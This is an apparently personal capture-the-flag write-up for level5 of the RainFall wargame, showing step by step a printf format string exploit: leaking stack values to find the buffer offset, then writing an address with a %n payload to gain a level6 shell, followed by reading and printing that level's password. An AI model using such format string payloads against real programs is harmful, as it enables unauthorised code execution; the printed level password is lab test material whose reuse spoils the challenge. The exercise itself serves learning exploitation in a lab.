#
# Documentation level5
#

 --> RAPPEL DOC LEVEL4: (kind of same shit) [for bufferoverflow expoit with printf]

STEP 1: Find our buffer position
level5@RainFall:~$ python -c 'print "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x"' | ./level5
BBBB 200 b7fd1ac0 b7ff37d0 [[42424242]] 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520

STEP 2: Remplace with the address we want to write
level5@RainFall:~$ python -c 'print "\x38\x98\x04\x08" + "%x %x %x %x"' | ./level5
8200 b7fd1ac0 b7ff37d0 [[8049838]]

STEP 3: Write what we want on the adresse we want
level5@RainFall:~$ (python -c 'print("\x38\x98\x04\x08" + "%134513824d%4$n")'; cat) | .evel5 | tr -d " "
whoami
8level6
pwd
/home/user/level5
cd ..
cd level6
cat .pass
d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31

---> This is the end
